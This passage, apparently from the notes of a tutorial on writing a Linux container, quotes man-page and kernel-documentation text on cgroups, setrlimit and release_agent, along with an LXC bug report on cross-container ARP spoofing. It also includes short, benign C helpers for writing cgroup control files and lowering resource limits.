	    mkdir /sys/fs/cgroup/cpu/cg1

	This creates a new empty cgroup.

	A process  may be moved  to this  cgroup by writing  its PID
	into the cgroup's cgroup.procs file:

	    echo $$ > /sys/fs/cgroup/cpu/cg1/cgroup.procs

	Only one PID at a time should be written to this file.

	Writing  the  value 0  to  a  cgroup.procs file  causes  the
	writing process to be moved to the corresponding cgroup.

	When writing a PID into the cgroup.procs, all threads in the
	process are moved into the new cgroup at once.

	Within a hierarchy, a process can be a member of exactly one
	cgroup.   Writing a  process's  PID to  a cgroup.procs  file
	automatically removes  it from  the cgroup  of which  it was
	previously a member.

	The cgroup.procs  file can be read  to obtain a list  of the
	processes that are  members of a cgroup.   The returned list
	of  PIDs is  not  guaranteed  to be  in  order.   Nor is  it
	guaranteed to  be free of  duplicates.  (For example,  a PID
	may be recycled while reading from the list.)

	In cgroups v1 (but not cgroups v2), an individual thread can
	be moved to  another cgroup by writing its  thread ID (i.e.,
	the kernel thread ID returned  by clone(2) and gettid(2)) to
	the tasks file in a cgroup directory.  This file can be read
	to  discover the  set of  threads  that are  members of  the
	cgroup.  This file is not present in cgroup v2 directories.
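
The shell steps in this excerpt translate fairly directly to C. A minimal sketch: cgroup_write is a hypothetical helper rather than a function from contained.c, and the paths in the note below assume the cgroup v1 layout used in the man page's own example.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: write `value` to the control file `name` inside
 * the cgroup directory `dir`. The kernel creates the control files when
 * the cgroup directory is made, so the file is opened without O_CREAT.
 * Returns 0 on success, -1 on any error. */
int cgroup_write(const char *dir, const char *name, const char *value)
{
	char path[4096];
	size_t len = strlen(value);
	ssize_t written;
	int n, fd;

	n = snprintf(path, sizeof(path), "%s/%s", dir, name);
	if (n < 0 || (size_t)n >= sizeof(path))
		return -1;
	fd = open(path, O_WRONLY);
	if (fd == -1)
		return -1;
	written = write(fd, value, len);
	if (close(fd) == -1 || written != (ssize_t)len)
		return -1;
	return 0;
}
```

With this, the man page's example becomes mkdir("/sys/fs/cgroup/cpu/cg1", 0755) followed by cgroup_write("/sys/fs/cgroup/cpu/cg1", "cgroup.procs", "0"), where writing 0 moves the calling process into the cgroup, as the excerpt describes.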

⁹²

Listing 184: man 2 setrlimit

	The soft limit is the value that the kernel enforces for the
	corresponding resource.   The hard  limit acts as  a ceiling
	for the soft limit: an unprivileged process may set only its
	soft limit  to a value  in the range from  0 up to  the hard
	limit,  and   (irreversibly)  lower   its  hard   limit.   A
	privileged    process   (under    Linux:   one    with   the
	CAP_SYS_RESOURCE capability)  may make arbitrary  changes to
	either limit value.
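
The "(irreversibly) lower its hard limit" clause is what makes setrlimit useful for containment: once the hard limit is lowered and CAP_SYS_RESOURCE is gone, the contained process can't undo it. A minimal sketch of that step; clamp_rlimit is a hypothetical helper, not a function from contained.c.

```c
#include <sys/resource.h>

/* Hypothetical helper: lower both the soft and the hard limit of
 * `resource` to at most `max`. Limits that are already lower are left
 * alone. After the hard limit drops, a process without CAP_SYS_RESOURCE
 * cannot raise it again. Returns 0 on success, -1 on error. */
int clamp_rlimit(int resource, rlim_t max)
{
	struct rlimit lim;

	if (getrlimit(resource, &lim) == -1)
		return -1;
	if (lim.rlim_cur > max)
		lim.rlim_cur = max;
	if (lim.rlim_max > max)
		lim.rlim_max = max;
	return setrlimit(resource, &lim);
}
```

For instance, clamp_rlimit(RLIMIT_NOFILE, 64) restricts the calling process, and anything it later forks or execs, to file descriptor numbers below 64.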

⁹³

Listing 186: Documentation/cgroup-v1/cgroups.txt@c8d2bc

1.4 What does notify_on_release do ?
------------------------------------

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.  This enables automatic
removal of abandoned cgroups.  The default value of
notify_on_release in the root cgroup at system boot is disabled
(0).  The default value of other cgroups at creation is the current
value of their parents' notify_on_release settings. The default value of
a cgroup hierarchy's release_agent path is empty.

It's annoying to set the release agent on a per-container basis, so we'll avoid it.

⁹⁴

Listing 188: "Cross-Container ARP Poisoning", an LXC bug report by Jesse Hertz of NCCGroup

Description:

An unprivileged LXC container can conduct an ARP spoofing attack
against another unprivileged LXC container running on the same
host. This allows man-in-the-middle attacks on another container's
traffic.

Recommendation:

Due to the complex nature of this involving the Linux bridge
interface, NCC is not aware of an easy fix. We suggest involving the
kernel networking team to allow for ARP restrictions on virtual bridge
interfaces. Using ebtables to block and control link layer traffic may
also be an effective fix. Documentation should reflect the risks of
not using any future protections or ebtables.

Stéphane Graber (stgraber) wrote on 2016-02-22:	#1
Hi,

Thanks for the report. This is not exactly news to us and has been
mentioned publicly a few times.

Our usual answer to this is that if you don't trust your users, you
shouldn't grant them access to a shared bridge, instead setup a
separate bridge for them.

MAC filtering through ebtables is an option but the problem with this
approach is that it essentially prevents container nesting as that
would lead to more than one MAC being used by the container which
ebtables would block.

[...]

On a local system, our answer to that is as I said to either trust
everyone you give access to a shared bridge or to segment traffic by
using multiple bridges.

⁹⁵

Listing 189: man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.
[...]

	net_prio (since Linux 3.3; CONFIG_CGROUP_NET_PRIO)
		This  allows priorities  to be  specified, per  network
		interface, for cgroups.

		Further information  can be found in  the kernel source
		file Documentation/cgroup-v1/net_prio.txt.